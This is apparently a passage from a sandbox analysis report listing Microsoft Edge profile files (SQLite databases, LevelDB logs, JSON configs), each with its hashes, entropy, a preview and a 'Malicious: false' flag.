SHA1:	A9059CD874567D9CFAE3AB788A3FE1E94E1DC5FF
SHA-256:	83CD5B222EBD0E11F55439CB8200E93B1C2C9335F9167117B81A9566DEFC28C1
SHA-512:	10E24AFB1EAE474D04B4B7B9D98E130BE9F4FD56EFE175568E1021C0673DAA3C4DAB7E1F7CEE58F5311A8ADD856ACF0A601B255F25F793013AF6BD75D63C0D2A
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g.....8...n................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DashTrackerDatabase

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 5, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 5
Category:	dropped
Size (bytes):	10240
Entropy (8bit):	0.8708334089814068
Encrypted:	false
SSDEEP:	12:LBtW4mqsmvEFUU30dZV3lY7+YNbr1dj3BzA2ycFUxOUDaazMvbKGxiTUwZ79GV:LLaqEt30J2NbDjfy6UOYMvbKGxjgm
MD5:	92F9F7F28AB4823C874D79EDF2F582DE
SHA1:	2D4F1B04C314C79D76B7FF3F50056ECA517C338B
SHA-256:	6318FCD9A092D1F5B30EBD9FB6AEC30B1AEBD241DC15FE1EEED3B501571DA3C7
SHA-512:	86FEF0E05F871A166C3FAB123B0A4B95870DCCECBE20B767AF4BDFD99653184BBBFE4CE1EDF17208B7700C969B65B8166EE264287B613641E7FDD55A6C09E6D4
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...v... .. .....M....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	352
Entropy (8bit):	5.2093173510486785
Encrypted:	false
SSDEEP:	6:HApWPiq2PN723oH+TcwtnG2tMsIFUt8YApjXZmw+YApjFkwON723oH+TcwtnG2tF:g0KvVaYebn9GFUt87BX/+7BF5OaYebnB
MD5:	5C0722230BAD76C4464E0C84B8587903
SHA1:	E2EB1D92640E19B954DBB2D4282EF93A23A30043
SHA-256:	1730CCA15963B33C1FA5338E663C117A58732550A8EF0BDBAF031E048E2DD71C
SHA-512:	B3986DB17C72474BB0E140C6C325C3A6BDFF8EBF174BF28DD0EF6A43AC19D651A66994960D8294976AF44DFA9A25BB1C9783E19789765D51B24A41496E84D189
Malicious:	false
Preview:	2024/11/25-18:25:30.067 1304 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/11/25-18:25:30.068 1304 Recovering log #3.2024/11/25-18:25:30.068 1304 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	352
Entropy (8bit):	5.2093173510486785
Encrypted:	false
SSDEEP:	6:HApWPiq2PN723oH+TcwtnG2tMsIFUt8YApjXZmw+YApjFkwON723oH+TcwtnG2tF:g0KvVaYebn9GFUt87BX/+7BF5OaYebnB
MD5:	5C0722230BAD76C4464E0C84B8587903
SHA1:	E2EB1D92640E19B954DBB2D4282EF93A23A30043
SHA-256:	1730CCA15963B33C1FA5338E663C117A58732550A8EF0BDBAF031E048E2DD71C
SHA-512:	B3986DB17C72474BB0E140C6C325C3A6BDFF8EBF174BF28DD0EF6A43AC19D651A66994960D8294976AF44DFA9A25BB1C9783E19789765D51B24A41496E84D189
Malicious:	false
Preview:	2024/11/25-18:25:30.067 1304 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/11/25-18:25:30.068 1304 Recovering log #3.2024/11/25-18:25:30.068 1304 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeHubAppUsage\EdgeHubAppUsageSQLite.db

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 6
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6128976856723295
Encrypted:	false
SSDEEP:	12:TLs9pRSJDBJuqJSEDNvrWjJQ9Dl9np59yDLgHFUxOUDaaTXubHa7mWbMAlyiZ7dV:TLapR+DDNzWjJ0npnyXKUO8+jqp0mL
MD5:	B086EDDB3FBEEF78A5F16395FB9B6525
SHA1:	048AAFA7BAD36E7F66619549707E49697F37E4C4
SHA-256:	B13739AC89CDAAFECE733FB4292792C92232BFFEF8F1CE0BB4F579EF3380DBC0
SHA-512:	337A51F83ED154F01AFC0FCF940BAA10008DF9E95C609B609456C8876459D06F23A9C83DA7EFE36587D4A94579E3509F749453F8D12F8E88AE5F442893F0F216
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...%.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000001.dbtmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	modified
Size (bytes):	375520
Entropy (8bit):	5.354150685304079
Encrypted:	false
SSDEEP:	6144:dA/imBpx6WdPSxKWcHu5MURacq49QxxPnyEndBuHltBfdK5WNbsVEziP/CfXtLPz:dFdMyq49tEndBuHltBfdK5WNbsVEziPU
MD5:	7119234BDC3EFEC35ABC3DF411842D93
SHA1:	F171E8F7E09E5DAE0C8E8ABF09966F2B4F2CEA8A
SHA-256:	3B07EFADC636D5BB857E8AC1E84DF4AF64457BC3AF00A3271D44B86E4B80EAD3
SHA-512:	7CF0F28E0188267110D02CD95735169AE8045597666AA32295DA1F9234EACDC1A182719A3CFDEE94285A0117B17DAAC8A04FE314EB42D25B8C6819445EFFE332
Malicious:	false
Preview:	...m.................DB_VERSION.1K...q...............&QUERY_TIMESTAMP:domains_config_gz2...13377050737876278..QUERY:domains_config_gz2....[{"name":"domains_config_gz","url":"https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig","version":{"major":2,"minor":8,"patch":76},"hash":"78Xsq/1H+MXv88uuTT1Rx79Nu2ryKVXh2J6ZzLZd38w=","size":374872}]..*.`~...............ASSET_VERSION:domains_config_gz.2.8.76..ASSET:domains_config_gz...{"config": {"token_limit": 1600, "page_cutoff": 4320, "default_locale_map": {"bg": "bg-bg", "bs": "bs-ba", "el": "el-gr", "en": "en-us", "es": "es-mx", "et": "et-ee", "cs": "cs-cz", "da": "da-dk", "de": "de-de", "fa": "fa-ir", "fi": "fi-fi", "fr": "fr-fr", "he": "he-il", "hr": "hr-hr", "hu": "hu-hu", "id": "id-id", "is": "is-is", "it": "it-it", "ja": "ja-jp", "ko": "ko-kr", "lv": "lv-lv", "lt": "lt-lt", "mk": "mk-mk", "nl": "nl-nl", "nb": "nb-no", "no": "no-no", "pl": "pl-pl", "pt": "pt-pt", "ro": "

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\CURRENT (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	315
Entropy (8bit):	5.15258045266326
Encrypted:	false
SSDEEP:	6:HApIL3FD1N723oH+Tcwtk2WwnvB2KLlVApILo+q2PN723oH+Tcwtk2WwnvIFUv:g8VDaYebkxwnvFLo89vVaYebkxwnQFUv
MD5:	CAED3C7934C37BC9968C7AA9C252F868
SHA1:	590CC7ACA1C21219607395CCAB5D13058B4B0846
SHA-256:	0C5C55BDE75DB95EE00C17D93B319B3FFBA1DCC3CA71E396627A9F4AE92A2D87
SHA-512:	9C3D5F647376634E0B37880285960CE114F9FE903038F8340BB6CC8E71BB5834E5764C7495253329424D2309C71CE28F6E8BF390BFDCA6D7D80B6C64888CF3DE
Malicious:	false
Preview:	2024/11/25-18:25:35.445 2108 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db since it was missing..2024/11/25-18:25:35.578 2108 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db/MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\MANIFEST-000001

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	41
Entropy (8bit):	4.704993772857998
Encrypted:	false
SSDEEP:	3:scoBAIxQRDKIVjn:scoBY7jn
MD5:	5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:	D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:	F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:	DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:	false
Preview:	.\|.."....leveldb.BytewiseComparator......

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\domains_config.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	358860
Entropy (8bit):	5.324619939891398
Encrypted:	false
SSDEEP:	6144:CgimBVvUrsc6rRA81b/18jyJNjfvrfM6RO:C1gAg1zfvm
MD5:	762E308137CC011194B217C32A7607ED
SHA1:	B8787CE27BFD29EE8060B47C134CF4B35E6E0439
SHA-256:	A8A41B22FE3A75A297928405FAAC57628DAD51C7F1DEAE658E17AB0E4A30A25D
SHA-512:	DF6E8C31143D4211D0F95CFE78FBC4C6C8B0EBE0938941782DF1C35740BAF369F091C2A5309DED7ED4658ED647D77327673735C4C12CE07C38C99CFFFB9ECE2C
Malicious:	false
Preview:	{"aee_config":{"ar":{"price_regex":{"ae":"(((ae\|aed\|\\x{062F}\\x{0660}\\x{0625}\\x{0660}\|\\x{062F}\\.\\x{0625}\|dhs\|dh)\\s\\d{1,3})\|(\\d{1,3}\\s(ae\|aed\|\\x{062F}\\x{0660}\\x{0625}\\x{0660}\|\\x{062F}\\.\\x{0625}\|dhs\|dh)))","dz":"(((dzd\|da\|\\x{062F}\\x{062C})\\s\\d{1,3})\|(\\d{1,3}\\s(dzd\|da\|\\x{062F}\\x{062C})))","eg":"(((e\\x{00a3}\|egp)\\s\\d{1,3})\|(\\d{1,3}\\s(e\\x{00a3}\|egp)))","ma":"(((mad\|dhs\|dh)\\s\\d{1,3})\|(\\d{1,3}\\s(mad\|dhs\|dh)))","sa":"((\\d{1,3}\\s(sar\\s\\x{fdfc}\|sar\|sr\|\\x{fdfc}\|\\.\\x{0631}\\.\\x{0633}))\|((sar\\s\\x{fdfc}\|sar\|sr\|\\x{fdfc}\|\\.\\x{0631}\\.\\x{0633})\\s\\d{1,3}))"},"product_terms":"((\\x{0623}\\x{0636}\\x{0641}\\s\\x{0625}\\x{0644}\\x{0649}\\s\\x{0627}\\x{0644}\\x{0639}\\x{0631}\\x{0628}\\x{0629})\|(\\x{0623}\\x{0636}\\x{0641}\\s\\x{0625}\\x{0644}\\x{0649}\\s\\x{0627}\\x{0644}\\x{062D}\\x{0642}\\x{064A}\\x{0628}\\x{0629})\|(\\x{0627}\\x{0634}\\x{062A}\\x{0631}\\x{064A}\\s*\\x{0627}\\x{0644}\\x{0622}\\x{0646})\|(\\x{062E}\\x{064A}\\x{0627}\\x{0631}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	418
Entropy (8bit):	1.8784775129881184
Encrypted:	false
SSDEEP:	6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
MD5:	BF097D724FDF1FCA9CF3532E86B54696
SHA1:	4039A5DD607F9FB14018185F707944FE7BA25EF7
SHA-256:	1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
SHA-512:	31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
Malicious:	false
Preview:	.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	325
Entropy (8bit):	5.096164131747058
Encrypted:	false
SSDEEP:	6:HApMMOq2PN723oH+Tcwt8aPrqIFUt8YApioZmw+YApA3DkwON723oH+Tcwt8amLJ:g+MOvVaYebL3FUt87r/+765OaYebQJ
MD5:	FC253193375DF09CF7459FF08561973C
SHA1:	93ACE444A8004723213380F3CE46B2C8ABADBBF5
SHA-256:	475F458E631C3198AC43ED48A6305EB48D0B98D93CB29BAAE731050ECAFC6A2A
SHA-512:	D5CE77AD9CF8F0869E026FD6FE89EF0006A8560C77AA852EA4D2C976866FA70AE33D27E6A7E938652067DF33DD2E4D2A62F8669F58A61902B122477C5261F0C7
Malicious:	false
Preview:	2024/11/25-18:25:30.007 2a0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/11/25-18:25:30.010 2a0 Recovering log #3.2024/11/25-18:25:30.011 2a0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	325
Entropy (8bit):	5.096164131747058
Encrypted:	false
SSDEEP:	6:HApMMOq2PN723oH+Tcwt8aPrqIFUt8YApioZmw+YApA3DkwON723oH+Tcwt8amLJ:g+MOvVaYebL3FUt87r/+765OaYebQJ
MD5:	FC253193375DF09CF7459FF08561973C
SHA1:	93ACE444A8004723213380F3CE46B2C8ABADBBF5
SHA-256:	475F458E631C3198AC43ED48A6305EB48D0B98D93CB29BAAE731050ECAFC6A2A
SHA-512:	D5CE77AD9CF8F0869E026FD6FE89EF0006A8560C77AA852EA4D2C976866FA70AE33D27E6A7E938652067DF33DD2E4D2A62F8669F58A61902B122477C5261F0C7
Malicious:	false
Preview:	2024/11/25-18:25:30.007 2a0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/11/25-18:25:30.010 2a0 Recovering log #3.2024/11/25-18:25:30.011 2a0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	418
Entropy (8bit):	1.8784775129881184
Encrypted:	false
SSDEEP:	6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
MD5:	BF097D724FDF1FCA9CF3532E86B54696
SHA1:	4039A5DD607F9FB14018185F707944FE7BA25EF7
SHA-256:	1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
SHA-512:	31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
Malicious:	false
Preview:	.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	329
Entropy (8bit):	5.130968701585808
Encrypted:	false
SSDEEP:	6:HApvNq2PN723oH+Tcwt865IFUt8YApxuJZmw+YApxuDkwON723oH+Tcwt86+ULJ:gFNvVaYeb/WFUt877o/+77w5OaYeb/+e
MD5:	3CBEAF8BB64D07C9CD3FB7CF990DAD45
SHA1:	15FB3F1ED0A2AA1F8139D3C0CA94E85091B531B7
SHA-256:	5A8F37140B7B3E1CC57354A0630921A87D420FBBF3C2EDCD4FA7CCC13D41AC1F
SHA-512:	257118D92A2482886FB0BA22C97AFB4E8F13DEF27F32C33325266D676BBD5D037D47F1EABC97EF319FD8A42209E1B47B3916F99343FFD961DD275E8D6A61A254
Malicious:	false
Preview:	2024/11/25-18:25:30.015 2a0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/11/25-18:25:30.093 2a0 Recovering log #3.2024/11/25-18:25:30.093 2a0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	329
Entropy (8bit):	5.130968701585808
Encrypted:	false
SSDEEP:	6:HApvNq2PN723oH+Tcwt865IFUt8YApxuJZmw+YApxuDkwON723oH+Tcwt86+ULJ:gFNvVaYeb/WFUt877o/+77w5OaYeb/+e
MD5:	3CBEAF8BB64D07C9CD3FB7CF990DAD45
SHA1:	15FB3F1ED0A2AA1F8139D3C0CA94E85091B531B7
SHA-256:	5A8F37140B7B3E1CC57354A0630921A87D420FBBF3C2EDCD4FA7CCC13D41AC1F
SHA-512:	257118D92A2482886FB0BA22C97AFB4E8F13DEF27F32C33325266D676BBD5D037D47F1EABC97EF319FD8A42209E1B47B3916F99343FFD961DD275E8D6A61A254
Malicious:	false
Preview:	2024/11/25-18:25:30.015 2a0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/11/25-18:25:30.093 2a0 Recovering log #3.2024/11/25-18:25:30.093 2a0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	1254
Entropy (8bit):	1.8784775129881184
Encrypted:	false
SSDEEP:	12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWA:
MD5:	826B4C0003ABB7604485322423C5212A
SHA1:	6B8EF07391CD0301C58BB06E8DEDCA502D59BCB4
SHA-256:	C56783C3A6F28D9F7043D2FB31B8A956369F25E6CE6441EB7C03480334341A63
SHA-512:	0474165157921EA84062102743EE5A6AFE500F1F87DE2E87DBFE36C32CFE2636A0AE43D8946342740A843D5C2502EA4932623C609B930FE8511FE7356D4BAA9C
Malicious:	false
Preview:	.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5........

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	328
Entropy (8bit):	5.15088411397695
Encrypted:	false
SSDEEP:	6:HApML/UyE9+q2PN723oH+Tcwt8NIFUt8YApMLkJZmw+YApMLk9VkwON723oH+TcN:go/pi+vVaYebpFUt87oG/+7oCV5OaYey
MD5:	AF16A4545D2882246A81D2F3BCA308A1
SHA1:	A87CA5D07F4470D65DE4192C5DC826625DC47E4D
SHA-256:	A1314F4789C984C79CFE4DE38BCF39A0924359631857F15AE6B0B46E4162B0D4
SHA-512:	B6F553DAB594E1295F72588C6EE2B9A77420EFB5C61C9FA5AFE28A7E467AE1D06D57838920CB5EFC51FC3FAA71213BE7281D78472AC057E774E60F3D9F4FCB61
Malicious:	false
Preview:	2024/11/25-18:25:31.369 1e2c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/11/25-18:25:31.370 1e2c Recovering log #3.2024/11/25-18:25:31.370 1e2c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	328
Entropy (8bit):	5.15088411397695
Encrypted:	false
SSDEEP:	6:HApML/UyE9+q2PN723oH+Tcwt8NIFUt8YApMLkJZmw+YApMLk9VkwON723oH+TcN:go/pi+vVaYebpFUt87oG/+7oCV5OaYey
MD5:	AF16A4545D2882246A81D2F3BCA308A1
SHA1:	A87CA5D07F4470D65DE4192C5DC826625DC47E4D
SHA-256:	A1314F4789C984C79CFE4DE38BCF39A0924359631857F15AE6B0B46E4162B0D4
SHA-512:	B6F553DAB594E1295F72588C6EE2B9A77420EFB5C61C9FA5AFE28A7E467AE1D06D57838920CB5EFC51FC3FAA71213BE7281D78472AC057E774E60F3D9F4FCB61
Malicious:	false
Preview:	2024/11/25-18:25:31.369 1e2c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/11/25-18:25:31.370 1e2c Recovering log #3.2024/11/25-18:25:31.370 1e2c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.1_0\_metadata\computed_hashes.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	429
Entropy (8bit):	5.809210454117189
Encrypted:	false
SSDEEP:	6:Y8U0vEjrAWT0VAUD9lpMXO4SrqiweVHUSENjrAWT0HQQ9/LZyVMQ3xqiweVHlrSQ:Y8U5j0pqCjJA7tNj0pHx/LZ4hcdQ
MD5:	5D1D9020CCEFD76CA661902E0C229087
SHA1:	DCF2AA4A1C626EC7FFD9ABD284D29B269D78FCB6
SHA-256:	B829B0DF7E3F2391BFBA70090EB4CE2BA6A978CCD665EEBF1073849BDD4B8FB9
SHA-512:	5F6E72720E64A7AC19F191F0179992745D5136D41DCDC13C5C3C2E35A71EB227570BD47C7B376658EF670B75929ABEEBD8EF470D1E24B595A11D320EC1479E3C
Malicious:	false
Preview:	{"file_hashes":[{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","6RbL+qKART8FehO4s7U0u67iEI8/jaN+8Kg3kII+uy4=","CuN6+RcZAysZCfrzCZ8KdWDkQqyaIstSrcmsZ/c2MVs="],"block_size":4096,"path":"content.js"},{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","UL53sQ5hOhAmII/Yx6muXikzahxM+k5gEmVOh7xJ3Rw=","u6MdmVNzBUfDzMwv2LEJ6pXR8k0nnvpYRwOL8aApwP8="],"block_size":4096,"path":"content_new.js"}],"version":2}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	8720
Entropy (8bit):	0.21785642788036433
Encrypted:	false
SSDEEP:	3:p3tDl9tFlljq7A/mhWJFuQ3yy7IOWUI8tnotdweytllrE9SFcTp4AGbNCV9RUI76:9xlG75fOF4d0Xi99pEYU
MD5:	4C67851F859B1B7D9BAAA09396CDEA0E
SHA1:	1D8F95C00180A450286045DE58D3FD797B46C362
SHA-256:	C25D3EAA200665554CF1CF13535CE40431CE1E937105FCDFDDDAB9525879F2AC
SHA-512:	26A1E277262163EB8E0CEA6407F90D60799BDA38DB78E88565FE8D768BFCC3496978DB6DDC57696EC1D12B4568D350E4E4E13D895FDB1415D778F09BEEF786EA
Malicious:	false
Preview:	............-.]_...&....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with very long lines (1597), with CRLF line terminators
Category:	dropped
Size (bytes):	115717
Entropy (8bit):	5.183660917461099
Encrypted:	false
SSDEEP:	1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
MD5:	3D8183370B5E2A9D11D43EBEF474B305
SHA1:	155AB0A46E019E834FA556F3D818399BFF02162B
SHA-256:	6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
SHA-512:	B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
Malicious:	false
Preview:	{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs\|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs\|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps Icons

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 12, cookie 0x3, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	3.648112779288423
Encrypted:	false
SSDEEP:	384:aj9P0ZcAjl+QkQeragam6IfP/Kbtn773pLXRKToaADhf:adLKl+e2NvP/m7JRKc39
